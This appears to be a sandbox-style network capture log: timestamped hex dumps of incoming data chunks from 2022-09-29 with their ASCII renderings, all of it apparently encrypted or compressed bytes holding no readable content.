                                                                                                                                                2022-09-29 12:51:51 UTC28796INData Raw: b3 7d 0c 1b 31 dd 40 2a 79 2d dc 2c a8 ab 38 bc e1 62 cf a2 4b b9 e0 32 97 0b af d4 5f d1 5d 3e f9 ce cd 0f a5 53 58 9f c4 42 38 92 27 59 18 be 78 7f 69 d7 54 a3 cf ec a8 5d 66 5e 5f 69 dd 1b 69 81 be b9 a1 d4 0b f4 d5 3e b6 50 58 7c 41 28 5b d5 2c 0e 5e 6d ed a3 6d e2 99 c1 06 b8 d7 12 76 76 79 9b 7b 25 d5 11 b0 ac 21 a1 29 09 10 b4 ec e1 78 5c 2e 08 3a de 3f e9 67 7c 72 86 0a cf df cf c0 80 a1 53 f8 c3 eb 9d 7a 60 ca d0 c3 18 e3 a4 86 4b d7 1c 71 87 18 23 ef af 8b 53 c7 23 64 b6 9f f9 15 ce 4d a1 a5 c8 43 d4 d9 05 1b 0f 82 a9 fd 5f 03 73 7d 3f fd 62 d8 c5 6d f2 03 37 ee c3 d1 2c 88 2a 8c ee 5e c0 70 2b 71 1a 11 ee bb b7 56 0f bf f5 fa 00 24 cc 65 13 9c 3c 6f 78 54 73 aa 6b 8e 97 87 36 09 76 6a 2c ba 22 2d e4 dc 87 d6 c9 c4 ab 76 d4 c3 af 34 2e da 24 bb
                                                                                                                                                Data Ascii: }1@*y-,8bK2_]>SXB8'YxiT]f^_ii>PX|A([,^mmvvy{%!)x\.:?g|rSz`Kq#S#dMC_s}?bm7,*^p+qV$e<oxTsk6vj,"-v4.$
                                                                                                                                                2022-09-29 12:51:51 UTC28812INData Raw: d0 87 e6 24 7d d5 66 5d c7 5b 04 d0 52 51 ff 4d 96 e0 cf 5c 11 21 93 ba cd fb f7 a3 b2 0b fc e8 08 e4 a3 05 18 0f b0 69 31 7d 40 21 45 f4 0d 88 85 00 d1 06 4c 08 d5 ee 0b 51 35 78 00 69 89 b9 8a 18 cc 42 b9 fe 41 7f 96 fe af 83 0f 9d 11 d5 54 23 b9 7d 46 55 9f bb a2 e1 32 51 56 87 5a 08 de 3c 0c e5 3b 1e ff ea b7 17 4c 26 c1 6f d0 d5 ed c9 7e 2c 3a a4 c8 42 da 48 e1 46 56 e5 e5 48 2b d4 a6 53 d2 d5 6b b0 a8 ed dd ff 2e a7 c9 cf 0a 8c e1 fa ba 85 e8 e8 12 b2 88 56 69 df e0 bf 31 7a 22 30 62 f0 64 c4 fb e7 de ce e2 2b 46 d3 52 88 c6 b6 4c 65 77 c5 a4 90 31 90 b0 b4 f5 cc d6 12 2b 6f d2 24 ca 40 be d7 38 83 5d 91 52 b1 b6 63 06 b0 a9 5a 32 7b ba 9a 23 af c7 91 3b a1 9d 06 41 05 5b fb 9e f6 50 e4 47 18 0d 12 e9 ab 06 9f 87 52 b2 c9 66 8e aa dc c3 f2 06 7d ca
                                                                                                                                                Data Ascii: $}f][RQM\!i1}@!ELQ5xiBAT#}FU2QVZ<;L&o~,:BHFVH+Sk.Vi1z"0bd+FRLew1+o$@8]RcZ2{#;A[PGRf}
                                                                                                                                                2022-09-29 12:51:51 UTC28828INData Raw: 5d 26 99 c4 68 f4 32 ab ed 08 9c a6 ab c8 51 b9 d4 6c 14 5d bb c4 d5 b2 90 34 f0 70 9d 28 ca 4d b2 2b 69 6f 26 16 a8 55 03 7e 3a 77 7f f8 de 44 33 91 63 2e a6 d6 d4 64 77 63 87 06 d2 1f bf 7e 00 82 0f 6e 16 da 66 e0 68 b3 f1 14 48 1b c2 a8 dd 99 cc ac 6c ce 3c d3 5d 50 7e 33 d4 b3 e0 c0 b5 a4 e1 5d 70 c9 45 59 f1 d7 92 43 9e 28 5b ef a4 97 63 ed 46 63 07 21 6e c2 79 0b 8e 6a 47 f1 f3 2a 61 c8 ed 2b 0e 7e b9 13 35 17 a0 4d ba 8c 2b 4c 87 2b 5e 00 d9 3c 8b 06 4f a9 d3 6a ae 54 36 09 b6 56 8c dd b3 94 62 fc 03 59 ea 01 6f 31 c3 6e 8f 3c 3e c1 8b a8 9f bf 09 e6 ee f9 a0 c3 38 a2 c3 1a 01 8d cd 9f 39 d2 51 62 e3 c4 a4 f7 42 c1 a3 51 5f ea 11 31 19 53 e8 9f 4c ff 26 91 5b a1 a4 18 44 be fa 9b b3 a6 db 6e 53 2a 2f 71 79 7d 19 61 ba ac 6d 42 5c 92 b6 95 82 da d4
                                                                                                                                                Data Ascii: ]&h2Ql]4p(M+io&U~:wD3c.dwc~nfhHl<]P~3]pEYC([cFc!nyjG*a+~5M+L+^<OjT6VbYo1n<>89QbBQ_1SL&[DnS*/qy}amB\
                                                                                                                                                2022-09-29 12:51:51 UTC28837INData Raw: 71 1f ce 58 0a 7b fe d6 56 e5 6b 9c 3b 3c 0f d8 6d d9 f2 02 05 cf 58 26 5a e2 eb 16 45 1f ad a6 9b 82 cd 88 72 32 d6 df 00 0d 92 41 64 18 d9 0d 2d 07 6d 2e f0 28 f1 33 49 13 20 6f e4 08 5e 15 0e 19 2e d2 03 77 73 8a 80 0e 10 74 63 12 bf 18 b9 2c 7f b9 9d d0 dd 6d ab 82 2a f8 2c 15 50 c8 47 d2 e4 64 00 da 4a 46 0d f0 c8 22 cd ef 97 92 d5 5e 82 a6 5f 5a f3 a2 d6 59 91 e0 95 d8 32 f7 d0 ee 59 b3 27 32 07 02 db 2f 22 dd ba 0d 3d 9b 4f 4c dd 97 e3 5b 59 d3 db a7 5c 8d c9 97 f6 d2 be c6 69 89 68 91 66 14 8f db 6f 64 20 19 30 83 85 5b 1b 22 c3 37 b8 2d 6e 2d 89 5d 2e 96 b0 d9 bd 96 2a da fb 3c c8 ba f6 ba eb 9b 34 96 2c d5 ca 9e ce 99 76 87 25 4c b6 16 b4 e5 b5 2f 8d d3 c5 41 d1 7a e5 51 88 2e 8b 1f 74 5d 46 87 cd 92 d6 35 67 79 c4 56 48 55 1d 2f 8e dc c5 b3 89
                                                                                                                                                Data Ascii: qX{Vk;<mX&ZEr2Ad-m.(3I o^.wstc,m*,PGdJF"^_ZY2Y'2/"=OL[Y\ihfod 0["7-n-].*<4,v%L/AzQ.t]F5gyVHU/
                                                                                                                                                2022-09-29 12:51:51 UTC28853INData Raw: bd 4f bb 60 0d f5 ad 98 bc da c6 6a 34 96 74 f1 ec 4b 6e 75 0b 9d 29 b5 cd d6 28 9a 94 74 ca 0f ad 5a 07 1c 1d 9a ff 08 65 80 c6 20 1d e4 05 c3 1a 22 ad d8 52 3c fe 5f a0 ec 88 af b7 e0 b6 30 a7 f2 50 03 24 77 c4 d2 28 ef ca 0b 2b 54 21 3e 0b 78 7a f7 ca 10 d6 5c 65 fe a7 22 d1 d8 37 13 ad bb ec 50 fe 80 ea 1a da cf 26 26 c2 96 0c ba d3 76 80 1b 52 9a 7b d1 5a 1e e7 0d b5 5e 3c af b2 78 a1 d9 d8 29 46 22 44 c2 64 9e 2d ab bb bc 43 82 9f 85 c4 b7 30 f8 a6 c5 92 85 07 ed b3 d8 11 3f 39 29 4a 8f f8 55 17 07 e9 c5 34 61 e0 7f 6c fb 8d 83 89 fc 00 15 12 c0 27 38 4d ec 61 4a 5b 33 17 f5 3c 64 df 36 9a 14 38 10 30 16 7c 98 04 a7 e5 b3 eb 7e 84 93 9e 5b dd 32 59 06 d0 18 ea af bf f9 bb b3 56 aa d7 ae df 29 3e 3e ca e0 96 2d ea 44 40 f6 72 39 39 52 4e a2 08 00 2a
                                                                                                                                                Data Ascii: O`j4tKnu)(tZe "R<_0P$w(+T!>xz\e"7P&&vR{Z^<x)F"Dd-C0?9)JU4al'8MaJ[3<d680|~[2YV)>>-D@r99RN*
                                                                                                                                                2022-09-29 12:51:51 UTC28869INData Raw: 5d a4 77 d0 04 bc ba 08 c9 29 0e e4 18 ae 7e 95 f1 25 c4 d8 06 79 18 12 9d c4 ae 59 82 74 26 29 9d e8 1a 8d 05 c5 f9 f5 86 5a bb c1 7e 82 2f e9 af b6 96 4f c3 ce 96 3f a4 40 84 0a 9c 9e 41 6b 8c 85 8e 6c 02 30 b1 16 e2 30 58 75 94 57 2a c2 5c 4a cb 75 31 da 16 57 c3 6d 73 b1 05 ff b6 4e 2e cf 3b a8 3b 7e d7 6d 96 eb a6 e3 f1 fa f7 84 22 f3 eb e6 48 b8 75 ab a6 62 8a f0 d4 66 7f 99 df cf 70 a6 12 21 dc d6 17 cc 34 51 2a 59 59 43 3f ec c6 4f 16 cf 84 b5 f7 02 dd ff 12 ab 2f 63 b0 61 49 eb b9 56 f5 69 dc b7 3c d1 6e 3f 43 c1 1b 18 57 69 b7 4c ac ec b8 07 31 4c 2d 93 aa eb b9 2f fb 59 d8 74 23 c1 15 dd c4 26 dd 5c e9 a1 f1 c6 24 89 f8 0b ff 1a 0e 42 a9 2e b0 79 15 c1 97 dd e4 e0 47 27 17 cf d8 0d ba 9c 59 83 be 8c 47 27 4d 73 41 66 82 7b 21 56 eb 92 52 07 84
                                                                                                                                                Data Ascii: ]w)~%yYt&)Z~/O?@Akl00XuW*\Ju1WmsN.;;~m"Hubfp!4Q*YYC?O/caIVi<n?CWiL1L-/Yt#&\$B.yG'YG'MsAf{!VR
                                                                                                                                                2022-09-29 12:51:51 UTC28885INData Raw: 9e 0f 19 e5 1c d2 40 2d 7f 6e 81 32 34 74 1e 4c 42 e4 6a 5d 52 9c ad c9 13 1c 0d 84 44 12 98 4f 99 cb 0f 34 8a 82 85 a8 62 29 0d 4b 70 5f b8 7d 91 9b 2f 33 6b 0c f7 05 ed c9 04 4b 93 43 cb 2a c8 90 a1 e2 3a 0a cf 7d fa e3 54 d6 9c 54 f3 f8 45 ff 32 39 93 67 e7 bd 76 8c f6 e8 84 95 34 1c 82 d0 05 b5 b9 7f 02 56 4c 29 5a 6c f2 a4 7d 55 f3 8c f8 8e 0e 32 cd 3a b2 e0 c6 34 ac f2 cf 7c 0c 60 ab 93 3f 9d e8 81 c6 3c 61 da 32 f1 25 8a 05 64 f2 89 e9 a6 9f 79 a4 cb 29 02 21 1a 60 78 d8 8b 4c 87 b5 de ed fb 58 48 fa fe a9 25 3a 67 38 1f 6c 7b 99 5e 6f 0a 10 6a 91 5f 9c af 68 04 80 11 3d 55 d9 49 b5 d2 90 c7 ef 81 11 85 75 6c 8d 52 6a a1 a7 d9 c1 1d 48 d5 63 0b 31 58 58 75 c0 cc 25 0d cd ad 4a af 70 a3 84 44 0e 8a 8e 10 b2 d1 36 54 31 04 49 7c 3f 91 fc 5a b5 4a fc
                                                                                                                                                Data Ascii: @-n24tLBj]RDO4b)Kp_}/3kKC*:}TTE29gv4VL)Zl}U2:4|`?<a2%dy)!`xLXH%:g8l{^oj_h=UIulRjHc1XXu%JpD6T1I|?ZJ
                                                                                                                                                2022-09-29 12:51:51 UTC28901INData Raw: 14 57 86 b6 c1 00 99 e6 66 97 3d e3 84 c8 05 48 cb b7 23 ef a2 94 ac 47 37 c1 0d c8 f5 05 ca 92 a4 fb 2a ce a8 10 1c b8 3f 8d ce 68 81 0d 1d 17 49 1e 18 8a bf 4e 94 08 4f f7 db 7f dc 4c 0d ad 44 cc 20 39 17 b0 a0 f9 76 94 51 0b 2b 44 eb ab 7a bd eb f7 dc a1 e5 14 fb 17 8b 5c 81 ec 0e 39 33 2d d5 58 aa ba 58 39 36 d9 01 8f 97 68 af fc d6 dc d9 03 cc 02 e2 5b ad e0 85 84 21 de f3 8b b2 83 5a 4b 58 58 34 94 0f 29 42 f7 dd d5 0e ee 3c af 38 15 b5 17 f8 d5 7f ae 7d d9 ff fb 9a c9 fa 45 32 8d ea 7c 5b 9e 8b 5d 64 df 57 b2 0b 06 ac 37 8c eb 7b 99 da 87 83 01 67 ec 4c af 80 da 0f 2f b2 50 37 2d 2b e9 f2 ba 15 0d 76 7f e4 66 b6 58 9a ca 93 df 1d 29 cc 86 bb c3 60 b8 65 80 13 09 74 64 6a b6 a1 b7 e7 fd a0 0c 48 70 5f 44 f4 4f 31 1a b7 2c bf 30 49 19 ba 61 4a 7c f5
                                                                                                                                                Data Ascii: Wf=H#G7*?hINOLD 9vQ+Dz\93-XX96h[!ZKXX4)B<8}E2|[]dW7{gL/P7-+vfX)`etdjHp_DO1,0IaJ|
                                                                                                                                                2022-09-29 12:51:51 UTC28917INData Raw: 7c a7 7b 5e 0c 85 7a 66 21 9a 8b af 5f 49 6c 14 34 e5 02 11 78 17 9c 18 4a fc 51 36 bb b9 eb 17 fe 2e 5a e9 03 63 72 2f ea 49 0e e3 bc 9d 2c 07 8f 2a ae 50 be 2e 19 92 72 93 1b a4 86 f9 c1 73 fa f6 7d 9c 77 f7 99 2c 0a 23 d5 43 64 9e 1b 01 4d bf 60 04 58 ce 46 f4 55 e8 35 82 6a 28 68 6f cc c1 c1 65 eb 04 f4 a0 41 c5 7a 11 34 63 8d ea e5 fa 0f 6e 84 85 c8 14 0f 32 3c c9 83 9e 12 17 9d a6 4b 2a 2f f8 dd 75 4e 3f 67 6a bb 3b c6 b2 b1 04 cc 2c 01 31 d1 2d a8 76 62 0f ce 67 93 0f 1d d8 9d 8d 07 26 14 b7 2e e7 6f cf 4e 2e a7 de 31 f2 8a b4 5a 6d 8b 1e f9 a0 fe 95 92 3d 52 c8 a5 e8 71 fc 87 ab 06 12 dd e2 da 66 7f fd a1 00 20 e4 c8 e2 7f 02 d8 37 21 6b 66 3b 55 1e 72 b9 94 3f 43 49 5b bc 48 8d 48 1b 9d 84 c5 48 91 ff 49 21 4f 0b 46 f5 d9 fb 9c 06 45 b6 2d 5d 9d
                                                                                                                                                Data Ascii: |{^zf!_Il4xJQ6.Zcr/I,*P.rs}w,#CdM`XFU5j(hoeAz4cn2<K*/uN?gj;,1-vbg&.oN.1Zm=Rqf 7!kf;Ur?CI[HHHI!OFE-]
                                                                                                                                                2022-09-29 12:51:51 UTC28933INData Raw: 6b 8a 93 33 7c 02 31 4e 29 e1 a3 13 83 2e 87 e3 9e 01 6c 2e 6b 32 61 5a c2 9b e8 05 16 db 2f 11 52 c8 3e 87 4c 75 42 64 a3 55 d9 6c 14 7c 40 5f e0 41 4a f3 e3 d0 30 3a 13 83 9e 2b 32 95 9a f3 a7 3e 67 73 f9 8d 29 a6 1e 1e b6 07 53 2a dd 9c b2 65 bc d6 d2 3d 06 0f ee 7f c7 95 97 2e b3 76 b4 29 8c da 1e 4e c6 90 74 14 77 a9 4d 73 17 48 ef 53 61 65 c5 d9 7a f8 f6 b5 56 1e a8 e8 c5 ab 0d 44 7f 6d 81 ff f3 90 b5 db 82 c4 25 74 73 a3 fb a4 43 64 b5 67 5f 10 ff a0 94 ab 0f a9 c0 17 ae b6 3c 41 e1 9e 77 cc 12 ea 76 47 79 bc 82 9a 32 73 c8 ce bc f2 94 97 dd 26 a2 dc 69 17 44 d9 fb f1 5f cb 63 e7 da dc 8d 10 79 f6 7d 75 0a 1d 39 4e 8f 71 18 8b 12 ed 63 9d cb 7c 00 10 50 8b cc 7a 76 72 d2 f2 8f 2b 34 c9 1d d1 f1 07 f8 42 0e 30 9d c0 e5 ba 71 65 87 ee 27 7e 90 5d de
                                                                                                                                                Data Ascii: k3|1N).l.k2aZ/R>LuBdUl|@_AJ0:+2>gs)S*e=.v)NtwMsHSaezVDm%tsCdg_<AwvGy2s&iD_cy}u9Nqc|Pzvr+4B0qe'~]
                                                                                                                                                2022-09-29 12:51:51 UTC28949INData Raw: 0c 14 01 d4 8c f8 02 51 1c 95 0c 9a de 29 d0 b7 55 e9 6f 0c 0a fb e2 a3 62 ba e2 b1 89 e2 6a 19 ea 4d b5 cd 4b 78 2c 28 b8 ab ac 19 e4 bf 7d d8 72 6f 58 95 83 5f f2 90 8d 4f 1e fa e5 62 2b a5 d2 5f 47 51 97 fa 79 e3 32 c6 ee bc 82 37 6a 62 da 99 68 99 12 59 b2 2b ca 5f 77 94 f7 42 83 a0 67 16 ff d4 0a c1 48 88 dd 83 b0 72 0c 7a 04 33 cf f2 56 c9 8e 30 f3 3a 98 e1 ff 9f d0 92 1a fc d1 e3 86 3a c9 06 0d 7a 61 5f 53 f2 f2 7a cf bf 4d a0 2e 6c 8e e4 92 e6 48 eb 92 97 35 f4 f4 09 7d 8c 0a fb 57 01 6e b0 69 56 35 7f 7a 9d a4 b3 93 71 7e 26 32 1f d6 3d 91 50 47 51 e3 ff 58 af 9b a7 0d a3 4d 33 dc 8b a7 af 12 c8 f2 2f 15 89 dd 79 31 7c c1 08 4b 31 9a fe b7 87 39 2b d2 68 65 03 9a ab 89 a7 b6 94 95 c0 80 b2 8d 31 37 97 f8 72 59 bb 91 7a be df 3a 9a 2d 2d 87 5d 11
                                                                                                                                                Data Ascii: Q)UobjMKx,(}roX_Ob+_GQy27jbhY+_wBgHrz3V0::za_SzM.lH5}WniV5zq~&2=PGQXM3/y1|K19+he17rYz:--]
                                                                                                                                                2022-09-29 12:51:51 UTC28965INData Raw: ba 41 6b d9 ec da 0b 2b d8 cd 68 76 a7 3b cc f5 8b f8 28 ad 70 56 5c 8b 40 63 8a a3 dd 99 22 d3 d3 df f8 50 d0 bb 3c f0 b2 95 ba 24 df 58 f3 86 d9 41 5b db 69 07 90 31 9c cd 3b 5e 2f 1c 80 ec f8 8d b3 b7 d2 d9 7d d8 0c 11 12 6d 2b 7f 07 8f 26 64 29 a9 3f bc 97 6b df c5 44 b6 20 e5 b9 f2 3e 79 04 df 8b de ff 3e 81 58 16 76 c3 d3 c5 28 0a 22 98 39 e4 c4 40 28 74 ed e6 c8 54 49 8f 04 a7 ea d8 7b 6b 5a 3b 92 07 c7 99 52 23 43 ae 78 af 3d 60 99 df 23 f6 54 c3 34 a7 b3 0f 86 a1 ea 92 ef 4a 41 00 96 83 06 d2 e4 b8 bc f3 d6 b4 d2 85 7e 88 d1 aa 88 4a c8 e7 cc 0b a9 31 82 d3 53 d4 c4 d3 bf 4c 51 73 ab 1a f5 61 a3 82 5d e6 06 5f 0f 2f d8 76 f2 8f ce b1 84 70 72 b1 2d 8d 7d 46 b4 2b 54 66 82 75 41 14 83 ad 7e 6e 3c 8b 07 63 8c 72 7c bb 87 25 1f 7e 0f 89 fd 87 a3 d8
                                                                                                                                                Data Ascii: Ak+hv;(pV\@c"P<$XA[i1;^/}m+&d)?kD >y>Xv("9@(tTI{kZ;R#Cx=`#T4JA~J1SLQsa]_/vpr-}F+TfuA~n<cr|%~
                                                                                                                                                2022-09-29 12:51:51 UTC28981INData Raw: ad e0 af e0 6a a5 b7 46 c9 a1 d9 ec 92 a9 35 7e d3 98 0e 25 66 e9 5b 4b 5d b2 65 b2 0e 81 46 29 4f c2 53 7d 54 53 81 04 91 f5 d4 4c 25 a3 ef b5 9e 95 32 94 d4 3f da e0 54 87 49 63 55 75 e3 7d 89 89 92 33 27 09 bd 6c 55 4f 8c fb a5 9f 66 37 5a 27 bd fc 11 d5 a0 8c b7 fd 25 dc a0 69 7f 28 0d b2 64 a5 ee f0 d0 ae 63 ad 7e 6a 7e e1 a1 75 d8 98 4c 10 fc d4 75 e8 bb 77 89 e6 eb f7 f1 63 cc b7 b5 4f 10 06 78 2c 67 0c f1 4c 88 93 d4 df b5 eb ee c5 9b 3e 6c 88 c5 3e b8 f3 c9 8d 62 ac 34 23 39 f4 36 ce 0e 10 e8 2d 3f 28 0b 2e 78 fd d5 b2 1f 22 01 ef 80 0a 4e 5f 39 cd 6b 38 cd 1b 05 3f 66 b2 74 3f 28 7a 96 1e 34 03 a3 88 a3 6d ef 65 aa f1 c2 80 a4 93 10 41 54 39 f9 4b 12 7a d7 f9 ba 3a 1c f4 d2 ed ea f6 fb 8c a0 24 8f 88 87 0e c5 58 f8 6c 20 dd 4b 24 5e 4a 07 4e d2
                                                                                                                                                Data Ascii: jF5~%f[K]eF)OS}TSL%2?TIcUu}3'lUOf7Z'%i(dc~j~uLuwcOx,gL>l>b4#96-?(.x"N_9k8?ft?(z4meAT9Kz:$Xl K$^JN
                                                                                                                                                2022-09-29 12:51:51 UTC28997INData Raw: f4 ff 69 b5 bf f3 42 2b e2 38 be c7 c8 b3 9a f9 eb 78 d1 19 d3 a9 f4 bd 72 ef f6 4b 26 21 bc 88 cb 20 75 3e df 9e 43 0d 22 0f 10 7c 93 27 9d c1 79 50 29 75 bb 42 1f ba fd 44 47 d2 52 1a d7 fb d6 6a dc 04 ec da 34 c5 06 ac 44 64 55 c5 d5 f5 4f b0 f5 ad a7 7d 17 5b e3 6d f3 ca 7b 0b 90 55 7d c5 5e b2 f4 c3 7b b0 36 65 f1 9e ca 1e 81 3d 49 90 cb 94 46 a2 12 01 c9 a7 e4 00 17 96 72 18 b7 73 1e 84 74 8d 8b e5 35 e3 14 0e 97 e6 61 58 e0 5a 30 72 74 95 09 07 e4 cb e9 8e 4c e0 ab e2 dc a4 ce 28 c9 6c 38 ac dd 9b a5 60 8b 04 69 95 12 ee 4b 36 7d ea d0 05 b8 b8 43 dd 0c c1 fd 34 d3 66 4b 86 20 3f b3 f2 5c 5e e8 76 7b 3d c7 21 d4 21 d5 5f 8f d1 5b fe 90 5d 94 21 c5 26 c5 15 30 48 df bd 47 b8 20 7c 2b 45 d3 b2 11 c5 27 62 eb 8e 2e 17 44 7b 6f e9 27 ef 39 6d d9 ad a2
                                                                                                                                                Data Ascii: iB+8xrK&! u>C"|'yP)uBDGRj4DdUO}[m{U}^{6e=IFrst5aXZ0rtL(l8`iK6}C4fK ?\^v{=!!_[]!&0HG |+E'b.D{o'9m
                                                                                                                                                2022-09-29 12:51:51 UTC29013INData Raw: 48 93 24 b8 60 55 e8 75 c5 46 7e 09 bc 71 82 69 1c c7 07 3a 11 34 64 af 42 4b 82 0a 61 1c e0 04 30 95 4d 40 16 77 03 91 cd 0b 96 c1 c9 4f 77 c6 ce 64 57 be e3 eb 82 99 07 40 84 d4 38 cb c5 06 60 fa fb 03 21 81 d1 bd ea d0 31 2a 4b 05 56 49 9e 85 42 f5 35 fd 34 07 30 ee e1 fa 1e 3a 89 ea 20 56 98 2f 44 cb 07 d6 68 5f 68 c6 c7 94 e0 7e 5d 19 84 66 35 b0 08 21 be be cc 59 11 e9 9a 81 a0 35 e3 b8 62 58 9d 61 d1 75 3b 45 37 e2 78 24 05 30 a4 5c c3 1e 75 b3 32 b4 90 c7 b1 bf 1c 64 4b 27 87 96 fc 23 7c da d6 a9 9e 70 42 ed f7 ac b3 60 af ae 01 38 e3 ca 1a a7 be fc 27 f7 4d e8 d4 b5 fb 4d 2f a7 ad a7 5d 09 e1 a8 45 2e 35 01 cb 66 48 fd 3a ca fe bd 6d 0e b0 85 7f aa 37 cf 69 2a 42 30 59 86 c2 bb 0e ed 0c e2 d7 7d fd 38 0b 80 44 5e 63 2e a4 b9 a3 7e d1 9d 59 13 01
                                                                                                                                                Data Ascii: H$`UuF~qi:4dBKa0M@wOwdW@8`!1*KVIB540: V/Dh_h~]f5!Y5bXau;E7x$0\u2dK'#|pB`8'MM/]E.5fH:m7i*B0Y}8D^c.~Y
                                                                                                                                                2022-09-29 12:51:51 UTC29029INData Raw: 14 e8 bd ea ce af ac de 5c ed df f8 b5 06 f5 c1 f3 e4 1a de a4 78 45 1a 48 66 fd 5a b8 db a1 59 10 29 4a 1e ed 0c 0e 37 4a 67 30 7a 94 c2 17 15 97 f6 57 13 72 ee b3 a8 0f 62 16 e8 61 3a c7 4a bf 0c 35 ac bf c3 19 08 28 b1 b6 fe 3e 39 06 d8 ea 06 93 b8 85 a8 1b a1 85 13 69 22 9a 3c e6 5e 4b 05 48 0a e7 9e 51 1f 9a ed 2e 21 7a d4 1f c7 54 8c de d7 9e 5e 84 73 b0 0c 10 b9 d5 95 3f 78 5e 26 dd 3c fe 1d 35 a2 21 1f fe 97 aa b7 97 99 f9 0d 34 2d 8b 97 fc cf 3c 3d 1d fc 8b 35 bd 0f 2f 2f 28 7f 80 21 9f 81 93 1d 25 3d 73 c4 76 f1 b2 b2 4e 1b 10 82 2c 81 fc 1e f4 18 8d 93 1c f9 63 a7 3b f0 9c 7e 1b bb c5 de 5c 5f b9 79 d8 d9 75 62 81 58 05 f3 ca 3e 21 18 99 96 dc eb 82 59 5f fd b1 77 c1 77 42 7b aa 4f dc 4f 88 33 b5 8b f8 47 21 a9 ab bb ca c0 a0 30 ed d5 3e 7b ba
                                                                                                                                                Data Ascii: \xEHfZY)J7Jg0zWrba:J5(>9i"<^KHQ.!zT^s?x^&<5!4-<=5//(!%=svN,c;~\_yubX>!Y_wwB{OO3G!0>{
                                                                                                                                                2022-09-29 12:51:51 UTC29045INData Raw: cb 80 f4 17 58 2f 27 a3 36 c0 51 eb 7d 2c 9c 6e 3e 52 71 39 56 3a 4f 35 a5 38 9e 84 3a 50 7d 39 b6 d9 c9 68 43 e9 4d 90 94 a1 7c 44 3a f6 0d fc 10 34 e9 c5 87 38 fe 2c 77 2a ba ba ed 23 18 0b 9d ee 36 27 2f b9 47 62 e1 ac d3 99 62 be bf b3 be f2 d6 bd 30 80 b6 4b ae 46 90 45 48 8b a5 c2 fd a3 21 c9 20 99 b5 5f dc 7f 5d 50 07 48 f5 77 fd eb da 55 43 61 36 02 06 c8 ad ef bb 7e 4f 82 a0 69 ad 24 66 bc 65 66 50 56 9d 9d 5b 9e b9 fd 60 b7 68 89 88 f5 bb 05 ce c7 17 2b 89 e6 6d 42 eb 17 a0 fa d5 91 d5 21 f5 85 64 3c a9 15 32 dd b5 13 32 95 a4 f6 cc 48 d6 fa 13 07 98 b2 15 b1 67 89 38 0b 13 76 a9 5a 8f 24 b8 33 10 d5 2b 3a 17 7e 79 ac 4a a2 f7 1b c8 f0 e7 14 ff 84 54 90 5c 90 4a 50 6c d0 8d 14 d8 f4 29 48 1f 52 17 30 2c 64 17 fb 25 12 6a 9a a6 6a 0a 28 d6 f0 80
                                                                                                                                                Data Ascii: X/'6Q},n>Rq9V:O58:P}9hCM|D:48,w*#6'/Gbb0KFEH! _]PHwUCa6~Oi$fefPV[`h+mB!d<22Hg8vZ$3+:~yJT\JPl)HR0,d%jj(
                                                                                                                                                2022-09-29 12:51:51 UTC29061INData Raw: 2e 6e 8d 83 a0 77 2c 04 b5 d0 ad b0 35 91 88 57 75 a9 5e 08 19 ed 0d 2c e5 df 55 0b ef 3c 50 aa 88 71 1e 59 43 c7 b3 4f 34 d9 12 ec d5 30 05 59 50 aa 89 16 21 b7 6c 31 98 dd ab b4 ff 66 b5 6b ae 75 5c fa b6 5a b0 f0 02 cc 88 4f b5 15 db e7 1c be 4e 43 fc 9c 86 d0 68 e7 01 24 3d ec 12 f4 5a 05 cd 9d 3d 14 54 6f 22 8a 7e 47 f5 fe 18 91 0a 04 20 d2 69 b8 47 0a a2 93 1b 70 0e 93 98 dd f3 4d 4b a7 5c 88 90 1c 22 42 24 33 9d 3e c0 af e2 40 c6 72 9f 67 7c b1 a1 13 a5 dc 24 d9 cf 49 71 01 3f dd f2 f6 98 ab 96 83 e3 a2 33 60 c6 df fe 4c d3 18 92 1e b2 dd 49 0a e7 0f 38 a2 cd 1e c4 33 7b 1e 06 0c 35 aa e8 c3 f5 e8 bb 30 85 79 f3 1b b1 14 f8 ce ea 7c 0a cb 09 21 b6 fc c7 8f 62 b9 08 51 5a 20 ef 63 61 22 08 6e f7 b3 39 d2 49 db 13 7e 8d 1f 14 04 78 11 55 12 c8 ce df
                                                                                                                                                Data Ascii: .nw,5Wu^,U<PqYCO40YP!l1fku\ZONCh$=Z=To"~G iGpMK\"B$3>@rg|$Iq?3`LI83{50y|!bQZ ca"n9I~xU
                                                                                                                                                2022-09-29 12:51:51 UTC29077INData Raw: d5 ef c0 8c a4 5c 42 06 4e 46 0a 57 f9 d3 1f cf 0e eb ca 65 40 5c 67 25 5f 9c e0 db fb 43 54 80 5f 42 b4 5f 47 b3 0d ae 5f fc 50 66 66 69 30 4e e1 3e b5 07 88 62 27 45 3b b9 7a 34 44 e5 23 f0 8f 0e 8f 62 d4 e2 99 46 a8 ca 04 49 4b a3 52 60 72 ef 5c b6 de 93 93 ca f9 ab 5a 4a 5a d3 31 b7 a5 e6 f2 f5 11 d3 22 5c 57 4c 64 72 89 c9 bf 5b 28 85 07 40 22 a3 88 ad c6 f9 19 c1 57 b5 f7 c7 0c 57 a0 57 04 f3 82 44 42 01 c5 df 7c ee c3 ea 1b e6 2f 50 e9 b7 8a c0 80 20 4d 02 5d b7 08 bb 13 2e 59 9e d5 96 ab a0 32 ec 47 78 52 cf fe 3e f1 a2 09 d0 4c 80 bd 7b 5d 98 55 8c 75 f5 23 80 79 a1 9b 33 20 df 0e 9b 96 90 9f ce 54 f7 fa 1a 93 83 45 ed f4 36 07 95 c6 ed b3 5b f4 26 d1 51 b2 1a 51 95 d6 00 03 0c dc 9a e0 aa 9c cc 3f 0e 78 7a 44 60 01 2f fc 44 3e fd 0b 72 44 1d 8a
                                                                                                                                                Data Ascii: \BNFWe@\g%_CT_B_G_Pffi0N>b'E;z4D#bFIKR`r\ZJZ1"\WLdr[(@"WWWDB|/P M].Y2GxR>L{]Uu#y3 TE6[&QQ?xzD`/D>rD
